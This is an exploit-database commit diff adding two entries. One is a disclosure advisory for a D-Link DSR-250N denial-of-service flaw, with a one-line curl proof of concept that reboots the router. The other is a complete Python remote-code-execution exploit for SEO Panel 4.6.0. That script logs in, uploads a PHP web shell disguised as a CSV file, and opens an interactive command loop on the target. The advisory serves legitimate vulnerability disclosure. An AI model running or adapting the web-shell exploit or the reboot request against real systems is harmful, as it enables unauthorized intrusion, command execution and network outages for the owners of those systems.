DB: 2020-10-09

2 changes to exploits/shellcodes SEO Panel 4.6.0 - Remote Code Execution D-Link DSR-250N 3.12 - Denial of Service (PoC)
2020-10-09 05:02:05 +00:00 · 2020-10-09 05:02:05 +00:00 · b45931e440
commit b45931e440
parent 1fbf4d267e
3 changed files with 220 additions and 0 deletions
--- a/exploits/hardware/webapps/48863.txt
+++ b/exploits/hardware/webapps/48863.txt
@ -0,0 +1,157 @@
+# Exploit Title: D-Link DSR-250N 3.12 - Denial of Service (PoC)
+# Google Dork: N/A
+# Author: RedTeam Pentesting GmbH
+# Date: 2020-10-03
+# Exploit Author: Kiko Andreu (kikoas1995) & Daniel Monzón (stark0de)
+# Vendor Homepage: https://www.dlink.com
+# Software Link: https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router
+# Version: 3.17B
+# CVE : CVE-2020-26567
+
+Advisory: Denial of Service in D-Link DSR-250N
+
+RedTeam Pentesting discovered a Denial-of-Service vulnerability in the
+D-Link DSR-250N device which allows unauthenticated attackers in the
+same local network to execute a CGI script which reboots the device.
+
+
+Details
+=======
+
+Product: D-Link DSR-250N
+Affected Versions: 3.12 and potentially later
+Fixed Versions: 3.17B
+Vulnerability Type: DoS
+Security Risk: low
+Vendor URL: https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router
+Vendor Status: notified
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-002
+Advisory Status: published
+CVE: CVE-2020-26567
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26567
+
+
+Introduction
+============
+
+"The D-Link Wireless N Unified Service Router (DSR-250N) provides
+enhanced security, functionality and performance over a traditional VPN
+router without the complexity of a full firewall solution. The D-Link
+Wireless N Unified Service Router is a cost-effective, high performance
+solution for securing a small business network."
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+During a penetration test, the firmware for the D-Link DSR-250N router
+was downloaded from D-Links official website[1] and extracted for
+further analysis. It was then confirmed that CGI scripts exist on the
+router that can be directly accessed with a web browser, without any
+authentication. In particular, the script "upgradeStatusReboot.cgi"
+executes the command to reboot the device. Its contents are:
+
+------------------------------------------------------------------------
+#!/bin/sh
+echo Content-type: text/plain
+echo ""
+stat=`/sbin/reboot -d 8 &`
+echo $stat
+------------------------------------------------------------------------
+
+Executing this script renders the device unusable for the time of the
+reboot. In tests, it turned out that the device needs roughly four
+minutes to complete a reboot. As a consequence, any network using the
+device as a switch or router is not accessible during that time, too.
+
+In the penetration test, the router's web interface was available
+directly over the Internet. According to the vendor, the web interface
+is by default disabled for the WAN interface.
+
+
+Proof of Concept
+================
+
+An HTTP GET request to the CGI script "upgradeStatusReboot.cgi" will
+reboot the device:
+
+------------------------------------------------------------------------
+$ curl -k -s https://IP-ADDRESS/scgi-bin/upgradeStatusReboot.cgi
+------------------------------------------------------------------------
+
+
+Workaround
+==========
+
+Access to the D-Link DSR-250N's web interface should only be enabled for
+administrators, for example by only allowing access from specific IP
+addresses in the firewall. Access over the WAN interface should also be
+disabled if it was enabled manually.
+
+
+Fix
+===
+
+A preview firmware version named 3.17B which should correct the issue
+was received at the end of September from the vendor. RedTeam Pentesting
+was not able to verify the fix due to lack of access to a test device.
+However, the formerly accessible CGI script is no longer part of the
+firmware.
+
+
+Security Risk
+=============
+
+No authentication is needed to excute the CGI script and thereby reboot
+the device. Attackers might abuse this behaviour for targeted
+denial-of-service-attacks against D-Link customers, since rebooting the
+device interrupts access to networks relying on this device for routing
+or switching purposes. However, the attack is only possible if the
+attacker resides on the same network, and no further information can be
+gathered or control over the devices be obtained. Therefore, the
+vulnerability is rated as a low risk.
+
+
+Timeline
+========
+
+2020-06-29 Vulnerability identified
+2020-07-03 Customer approved disclosure to vendor
+2020-07-03 Requested security contact from vendor via web formular
+2020-07-03 Vendor replied with contact information
+2020-07-07 Advisory provided to vendor
+2020-09-28 Vendor provided fixed version to RedTeam Pentesting
+2020-10-05 CVE ID requested
+2020-10-06 CVE ID assigned
+2020-10-08 Advisory released
+
+
+References
+==========
+
+[1] https://support.dlink.com/ProductInfo.aspx?m=DSR-250N
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
+
+
+Working at RedTeam Pentesting
+=============================
+
+RedTeam Pentesting is looking for penetration testers to join our team
+in Aachen, Germany. If you are interested please visit:
--- a/exploits/php/webapps/48862.py
+++ b/exploits/php/webapps/48862.py
@ -0,0 +1,61 @@
+# Exploit Title: SEO Panel 4.6.0 - Remote Code Execution
+# Google Dork: N/A
+# Date: 2020-10-03
+# Exploit Author: Kiko Andreu (kikoas1995) & Daniel Monzón (stark0de)
+# Vendor Homepage: https://seopanel.org/
+# Software Link: https://www.seopanel.org/spdownload/4.6.0
+# Version: 4.6.0
+# Tested on: Kali Linux x64 5.4.0
+# CVE : N/A
+
+#!/usr/bin/python
+
+import sys
+import os
+import requests
+
+ip = sys.argv[1]
+user = sys.argv[2]
+pwd = sys.argv[3]
+port = sys.argv[4]
+proto = sys.argv[5]
+
+if (len(sys.argv) < 6):
+    print "Usage: python " + sys.argv[0] + " <ip> + <webapp user> + <webapp pwd> + <webapp port> + <http/https>"
+    exit()
+
+session = requests.session()
+
+# Get to login page
+burp0_url = proto + "://" + ip + ":" + port + "//login.php"
+burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+session.get(burp0_url, headers=burp0_headers, verify=False)
+
+# Login with the provided credentials 
+burp0_url = proto + "://" + ip + ":" + port + "//login.php"
+burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": proto + "://" + ip + "//login.php", "Content-Type": "application/x-www-form-urlencoded", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+burp0_data = {"sec": "login", "red_referer": proto + "://" + ip + "/", "userName": user, "password": pwd, "login": ''}
+session.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False)
+
+# Upload the webshell
+burp0_url = proto + "://" + ip + ":" + port + "//websites.php"
+burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": proto + "://" + ip + "//admin-panel.php", "Content-Type": "multipart/form-data; boundary=---------------------------193626971803013289998688514", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+burp0_data = "-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"sec\"\r\n\r\nimport\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"userid\"\r\n\r\n1\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"website_csv_file\"; filename=\"shell.php\"\r\nContent-Type: text/csv\r\n\r\n<?php system($_GET['c']); ?>\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"delimiter\"\r\n\r\n,\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"enclosure\"\r\n\r\n\"\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"escape\"\r\n\r\n\\\r\n-----------------------------193626971803013289998688514--\r\n"
+session.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False)
+
+exit = 0
+first = 1
+# Loop for remote code execution
+while (exit == 0):
+    cmd = raw_input("> ")
+
+    burp0_url = proto + "://" + ip + ":" + port + "//tmp/shell.php?c=" + cmd
+    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+    x = session.get(burp0_url, headers=burp0_headers, verify=False)  
+    if (x.status_code == 200 and first == 1):
+        first = 0
+        print "[+] Shell uploaded successfully!"
+    
+    print x.text 
+    if (cmd == "exit"):
+        exit = 1
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -40680,6 +40680,8 @@ id,file,description,date,author,type,platform,port
 48857,exploits/hardware/webapps/48857.txt,"Karel IP Phone IP1211 Web Management Panel - Directory Traversal",2020-10-06,"berat isler",webapps,hardware,
 48858,exploits/json/webapps/48858.txt,"EasyPMS 1.0.0 - Authentication Bypass",2020-10-06,Jok3r,webapps,json,
 48861,exploits/php/webapps/48861.txt,"Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting",2020-10-07,"Alperen Ergel",webapps,php,
+48862,exploits/php/webapps/48862.py,"SEO Panel 4.6.0 - Remote Code Execution",2020-10-08,"Kiko Andreu",webapps,php,
+48863,exploits/hardware/webapps/48863.txt,"D-Link DSR-250N 3.12 - Denial of Service (PoC)",2020-10-08,"RedTeam Pentesting GmbH",webapps,hardware,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,